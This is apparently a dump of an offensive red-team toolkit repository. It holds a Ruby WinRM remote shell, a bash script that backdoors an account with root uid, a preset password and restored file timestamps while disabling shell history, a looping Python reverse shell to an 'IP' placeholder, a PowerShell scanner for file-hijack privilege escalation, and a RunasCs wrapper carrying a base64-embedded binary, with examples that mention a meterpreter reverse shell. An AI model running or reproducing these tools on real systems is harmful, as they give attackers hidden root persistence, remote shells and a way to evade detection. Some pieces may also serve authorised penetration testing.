myfile.txt C:\temp\myfile.txt 11 | # e.g.: PS> DOWNLOAD C:\temp\myfile.txt myfile.txt 12 | 13 | reader = TTY::Reader.new 14 | 15 | options = {} 16 | OptionParser.new do |opts| 17 | opts.banner = "Usage: #{$0} [options]" 18 | 19 | opts.on('-h', '--host HOST', 'Host address') { |v| options[:host] = v } 20 | opts.on('-P', '--port PORT', Integer, 'Host port') { |v| options[:port] = v } 21 | opts.on(nil, '--ssl', 'HTTPS protocol') { |v| options[:ssl] = v } 22 | opts.on('-u', '--user USERNAME', 'Username') { |v| options[:username] = v } 23 | opts.on('-p', '--password PASSWORD', 'Password') { |v| options[:password] = v } 24 | opts.on(nil, '--help', 'Display this screen') do 25 | puts opts 26 | exit 27 | end 28 | 29 | end.parse! 30 | 31 | if options[:ssl] then 32 | protocol = "https" 33 | else 34 | protocol = "http" 35 | end 36 | host = options[:host] 37 | port = options[:port] 38 | if not port then 39 | if options[:ssl] then 40 | port = 5986 41 | else 42 | port = 5985 43 | end 44 | end 45 | username = options[:username] 46 | password = options[:password] 47 | 48 | if not host then 49 | puts "No host specified" 50 | exit 51 | end 52 | 53 | if not username then 54 | username = reader.read_line("Username: ").chomp 55 | end 56 | 57 | if not password then 58 | password = reader.read_line("Password: ", echo: false).chomp 59 | end 60 | 61 | #reader = TTY::Reader.new(history_duplicates: true) 62 | reader = TTY::Reader.new(history_duplicates: false) 63 | reader.on(:keyctrl_x) { puts ""; puts "Exiting..."; exit } 64 | 65 | conn = WinRM::Connection.new( 66 | endpoint: "#{protocol}://#{host}:#{port}/wsman", 67 | transport: :ssl, 68 | user: username, 69 | password: password, 70 | :no_ssl_peer_verification => true 71 | ) 72 | 73 | file_manager = WinRM::FS::FileManager.new(conn) 74 | 75 | class String 76 | def tokenize 77 | self. 78 | split(/\s(?=(?:[^'"]|'[^']*'|"[^"]*")*$)/). 79 | select {|s| not s.empty? }. 80 | map {|s| s.gsub(/(^ +)|( +$)|(^["']+)|(["']+$)/,'')} 81 | end 82 | end 83 | 84 | command = "" 85 | 86 | conn.shell(:powershell) do | shell | 87 | until command == "exit\n" do 88 | begin 89 | output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$pwd,'> ')") 90 | command = reader.read_line(output.output.chomp) 91 | 92 | if command.start_with?('UPLOAD ') then 93 | upload_command = command.tokenize 94 | src = upload_command[1] 95 | dest = upload_command[2] 96 | 97 | if not dest then 98 | dest = upload_command[1].split('/')[-1] 99 | end 100 | if not dest.index ':\\' then 101 | output = shell.run("-join($pwd)") 102 | dest = output.output.chomp.strip() + "\\" + dest 103 | end 104 | 105 | puts("Uploading " + src + " to " + dest) 106 | file_manager.upload(src, dest) do | bytes_copied, total_bytes, local_path, remote_path | 107 | puts("#{bytes_copied} bytes of #{total_bytes} bytes copied") 108 | end 109 | command = "echo OK`n" 110 | end 111 | 112 | if command.start_with?('DOWNLOAD ') then 113 | download_command = command.tokenize 114 | 115 | src = download_command[1] 116 | if not src.index ':\\' then 117 | output = shell.run("-join($pwd)") 118 | src = output.output.chomp.strip() + "\\" + src 119 | end 120 | 121 | dest = download_command[2] 122 | if not dest then 123 | dest = download_command[1].split('\\')[-1] 124 | end 125 | 126 | puts("Downloading " + src + " to " + dest) 127 | file_manager.download(src, dest) do | bytes_copied, total_bytes, remote_path, local_path | 128 | puts("#{bytes_copied} bytes of #{total_bytes} bytes copied") 129 | end 130 | command = "echo OK`n" 131 | end 132 | 133 | output = shell.run(command) do | stdout, stderr | 134 | if stdout != nil 135 | STDOUT.write stdout.rstrip + "\n" 136 | end 137 | if stderr != nil 138 | STDOUT.write stderr.rstrip + "\n" 139 | end 140 | end 141 | rescue => e 142 | puts e 143 | end 144 | end 145 | puts("Exiting with code #{output.exitcode}") 146 | end 147 | -------------------------------------------------------------------------------- /persistence/backdoor-passwd.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | set +o history 4 | echo "[i] - history disabled.." 5 | 6 | if [[ $EUID > 0 ]]; then 7 | echo "[!] - you have to be root ¯\_(ツ)_/¯" 8 | exit 9 | fi 10 | 11 | user=${1:-"uucp"} 12 | password=${2:-"b4ckd00r3d"} 13 | mtime_passwd=`stat -c "%y" /etc/passwd` 14 | mtime_shadow=`stat -c "%y" /etc/shadow` 15 | mtime_passwd_seconds=`stat -c "%y" /etc/passwd | cut -d'.' -f 1 | sed -e "s/[-| |:]//g"` 16 | mtime_shadow_seconds=`stat -c "%y" /etc/shadow | cut -d'.' -f 1 | sed -e "s/[-| |:]//g"` 17 | 18 | echo "[!] - /etc/passwd was modified @ ${mtime_passwd}" 19 | echo "[!] - /etc/shadow was modified @ ${mtime_shadow}" 20 | 21 | echo "[!] - setting ${user} uid and gid to 0 and enabling shell" 22 | sed -i "s/.*${user}.*/${user}:x:0:0:${user}:\/dev\/shm\/.${user}:\/bin\/bash/" /etc/passwd 23 | 24 | echo "[!] - restoring mtime of /etc/passwd to ${mtime_passwd}" 25 | touch -d "${mtime_passwd}" /etc/passwd 26 | 27 | echo "[!] - setting ${user} password to ${password}" 28 | echo "${user}:${password}" | chpasswd 29 | 30 | echo "[!] - restoring mtime of /etc/shadow to ${mtime_shadow}" 31 | touch -d "${mtime_shadow}" /etc/shadow 32 | 33 | echo "[!] - creating home directory in /dev/shm/.${user}" 34 | mkdir -p "/dev/shm/.${user}" 35 | 36 | echo "[!] - disabling bash history for ${user} user" 37 | echo "set +o history" > /dev/shm/.${user}/.bash_profile 38 | echo "set +o history" > /dev/shm/.${user}/.bash_rc 39 | 40 | echo "[!] - unsetting HISTFILE for ${user} user" 41 | echo "unset HISTFILE" >> /dev/shm/.${user}/.bash_profile 42 | echo "unset HISTFILE" >> /dev/shm/.${user}/.bash_rc 43 | 44 | echo "[!] - disabling eventual PROMPT_COMMAND keylogger" 45 | echo "unset PROMPT_COMMAND" >> /dev/shm/.${user}/bash_profile 46 | echo "unset PROMPT_COMMAND" >> /dev/shm/.${user}/bash_rc 47 | 48 | echo "[!] - enjoy your new pseudo-root account ツ" 49 | echo "[!] - ${user} : ${password}" 50 | 51 | exit 52 | -------------------------------------------------------------------------------- /persistence/nohup.sh: -------------------------------------------------------------------------------- 1 | nohup /bin/bash -c "while true; do \$(which python3 || which python2 || which python) -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"IP\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);'; done" 2>/dev/null & 2 | -------------------------------------------------------------------------------- /privilege-escalation/Invoke-FileHijackCheck/Invoke-FileHijackCheck.ps1: -------------------------------------------------------------------------------- 1 | $ErrorActionPreference= 'silentlycontinue' 2 | #$ErrorActionPreference= 'continue' 3 | 4 | # https://stackoverflow.com/a/24992975 5 | function Test-FileWriteLock { 6 | param ( 7 | [parameter(Mandatory=$true)][string]$Path 8 | ) 9 | 10 | $oFile = New-Object System.IO.FileInfo $Path 11 | 12 | if ((Test-Path -Path $Path) -eq $false) { 13 | return $false 14 | } 15 | 16 | try { 17 | $oStream = $oFile.Open([System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::None) 18 | 19 | if ($oStream) { 20 | $oStream.Close() 21 | } 22 | $false 23 | } catch { 24 | # file is locked by a process. 25 | return $true 26 | } 27 | } 28 | 29 | function Test-FileOpenLock() { 30 | param ( 31 | [parameter(Mandatory=$true)] 32 | [string] 33 | $Path 34 | ) 35 | 36 | $relativePath = (split-path -noq $Path).substring(1) 37 | $res = $(.\handle.exe -nobanner $relativePath) 38 | if ($res -eq "No matching handles found.") { 39 | return $false 40 | } 41 | 42 | return $true 43 | } 44 | 45 | function CheckFile() { 46 | Param( 47 | [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] 48 | [String] 49 | [ValidateNotNullOrEmpty()] 50 | $Identity, 51 | 52 | [Parameter(Position = 1, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] 53 | [String] 54 | [ValidateNotNullOrEmpty()] 55 | $Path 56 | ) 57 | 58 | $acls = $(acl $Path) | select -ExpandProperty access 59 | 60 | if ($acls) { 61 | $builtin_users = $(acl $Path | select -ExpandProperty access | Where-Object {$_.identityreference -eq $Identity}) 62 | foreach ($perm in $builtin_users.FileSystemRights) { 63 | if (($perm -like "*FullControl*") -or 64 | ($perm -like "*Delete*") -or 65 | ($perm -like "*Modify*")) { 66 | return $perm 67 | } 68 | } 69 | } 70 | 71 | return 0 72 | } 73 | 74 | function CheckDirectory() { 75 | Param( 76 | [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] 77 | [String] 78 | [ValidateNotNullOrEmpty()] 79 | $Identity, 80 | 81 | [Parameter(Position = 1, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] 82 | [String] 83 | [ValidateNotNullOrEmpty()] 84 | $Path 85 | ) 86 | 87 | $acls = $(acl $Path) | select -ExpandProperty access 88 | 89 | if ($acls) { 90 | $builtin_users = $(acl $Path | select -ExpandProperty access | Where-Object {$_.identityreference -eq $Identity}) 91 | foreach ($perm in $builtin_users.FileSystemRights) { 92 | if (($perm -like "*FullControl*") -or 93 | ($perm -like "*Write*") -or 94 | ($perm -like "*CreateFiles*") -or 95 | ($perm -like "*Modify*")) { 96 | return $perm 97 | } 98 | } 99 | } 100 | 101 | return 0 102 | } 103 | 104 | function Invoke-FileHijackCheck() { 105 | <# 106 | 107 | .SYNOPSIS 108 | 109 | Simple function to analyze ProcMon CSV output checking for potential Symlink File Hijack to SYSTEM Impersonation Attacks 110 | 111 | Author: Francesco Soncina (phra) 112 | License: BSD 3-Clause 113 | 114 | .DESCRIPTION 115 | 116 | Simple function to analyze ProcMon CSV output checking for potential Symlink File Hijack to SYSTEM Impersonation Attacks. 117 | It needs "Handle.exe" from SysInternals in the same directory of this script. 118 | To export data from ProcMon, save it in CSV format. (filter by Operation:WriteFile + User:NT AUTHORITY\SYSTEM) 119 | 120 | .PARAMETER Csv 121 | 122 | The CSV file to read. 123 | 124 | .EXAMPLE 125 | 126 | Invoke-FileHijackCheck .\Logfile.csv 127 | 128 | Analyze CSV file Logfile.csv in the current directory 129 | 130 | #> 131 | [CMDLetBinding()] 132 | Param( 133 | [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] 134 | [String] 135 | [ValidateNotNullOrEmpty()] 136 | $Csv, 137 | 138 | [switch] 139 | $ShowOnlyVulnerable 140 | ) 141 | 142 | $paths = type $Csv | convertfrom-csv | Sort-Object -prop path -unique 143 | $usersToCheck = "NT AUTHORITY\INTERACTIVE", 144 | "BUILTIN\Users", 145 | "NT AUTHORITY\Authenticated Users", 146 | "NT AUTHORITY\LOCAL SERVICE", 147 | "Everyone", 148 | $(whoami) 149 | 150 | foreach ($path in $paths) { 151 | $acls = $(acl $path.Path) | select -ExpandProperty access 152 | foreach ($user in $usersToCheck) { 153 | $res = $(CheckFile $user $path.Path) 154 | 155 | if ($res -ne 0) { 156 | $parent = Split-Path -path $path.Path 157 | $res2 = $(CheckDirectory $user $parent) 158 | if ($res2 -ne 0) { 159 | if (Test-FileOpenLock $path.Path) { 160 | if (-not $ShowOnlyVulnerable) { 161 | write-host -nonewline $user " => " $path.Path 162 | write-host -ForegroundColor green " [LOCKED]" 163 | } 164 | } else { 165 | write-host -nonewline $user " => " $path.Path 166 | write-host -ForegroundColor red " [VULNERABLE!]" 167 | } 168 | } 169 | } 170 | } 171 | } 172 | } 173 | -------------------------------------------------------------------------------- /privilege-escalation/Invoke-FileHijackCheck/handle.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/d0nkeys/redteam/d8ad2009a354d466e11fda6074dd4610f82089ee/privilege-escalation/Invoke-FileHijackCheck/handle.exe -------------------------------------------------------------------------------- /privilege-escalation/Invoke-RunasCs.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | RunasCs is an utility to run specific processes with different permissions 3 | than the user's current logon provides using explicit credentials. 4 | Author: @splinter_code 5 | License: GPL-3.0 6 | Source: https://github.com/antonioCoco/RunasCs 7 | #> 8 | 9 | #Requires -Version 2 10 | 11 | function Invoke-RunasCs 12 | { 13 | <# 14 | .SYNOPSIS 15 | RunasCs - Csharp and open version of windows builtin runas.exe 16 | 17 | .PARAMETER Username 18 | The username of the user 19 | .PARAMETER Password 20 | The password of the user 21 | .PARAMETER Command 22 | A command supported by cmd.exe if ProcessTimeout>0 23 | The commandline for the process if ProcessTimeout=0 24 | .PARAMETER Domain 25 | The domain of the user, if in a domain. 26 | Default: "" 27 | .PARAMETER ProcessTimeout 28 | The waiting time (in ms) to use in 29 | the WaitForSingleObject() function. 30 | This will halt the process until the spawned 31 | process ends and sent the output back to the caller. 32 | If you set 0 an async process will be 33 | created and no output will be retrieved. 34 | If this parameter is set to 0 it won't be 35 | used cmd.exe to spawn the process. 36 | Default: "120000" 37 | .PARAMETER LogonType 38 | The logon type for the spawned process. 39 | Default: "3" 40 | 41 | .EXAMPLE 42 | Run a command as a specific local user 43 | Invoke-RunasCs user1 password1 whoami 44 | .EXAMPLE 45 | Run a command as a specific domain user 46 | Invoke-RunasCs -Domain domain1 -Username user1 -Password password1 -Command whoami 47 | .EXAMPLE 48 | Run a command as a specific local user with interactive logon type (2) 49 | Invoke-RunasCs -Username user1 -Password password1 -Command whoami -LogonType 2 50 | .EXAMPLE 51 | Run a background/async process as a specific local user, 52 | i.e. meterpreter ps1 reverse shell 53 | Invoke-RunasCs -Username user1 -Password "password1" -ProcessTimeout 0 -Command "%COMSPEC% powershell -enc..." 54 | .EXAMPLE 55 | Run a background/async interactive process as a specific local user, 56 | i.e. meterpreter ps1 reverse shell 57 | Invoke-RunasCs -Username user1 -Password password1 -ProcessTimeout 0 -LogonType 2 -Command "%COMSPEC% powershell -enc.." 58 | #> 59 | Param 60 | ( 61 | [Parameter(Position = 0, Mandatory = $True)] 62 | [String] 63 | $Username, 64 | 65 | [Parameter(Position = 1, Mandatory = $True)] 66 | [String] 67 | $Password, 68 | 69 | [Parameter(Position = 2, Mandatory = $True)] 70 | [String] 71 | $Command, 72 | 73 | [Parameter()] 74 | [String] 75 | $Domain = "", 76 | 77 | [Parameter()] 78 | [String] 79 | $ProcessTimeout = "120000", 80 | 81 | [Parameter()] 82 | [String] 83 | $LogonType = "3" 84 | ) 85 | [string[]] $parameteresRunasCs = @($Username, $Password, $Command, $Domain, $ProcessTimeout, $LogonType) 86 | $RunasCsBase64 = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJLV8l0AAAAAAAAAAOAAAgELAQgAAIAAAAAgAAAAAAAAbpwAAAAgAAAAoAAAAABAAAAgAAAAEAAABAAAAAAAAAAEAAAAAAAAAADgAAAAEAAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAABicAABTAAAAAKAAAMgCAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAdHwAAAAgAAAAgAAAABAAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAMgCAAAAoAAAABAAAACQAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAMAAAAAQAAAAoAAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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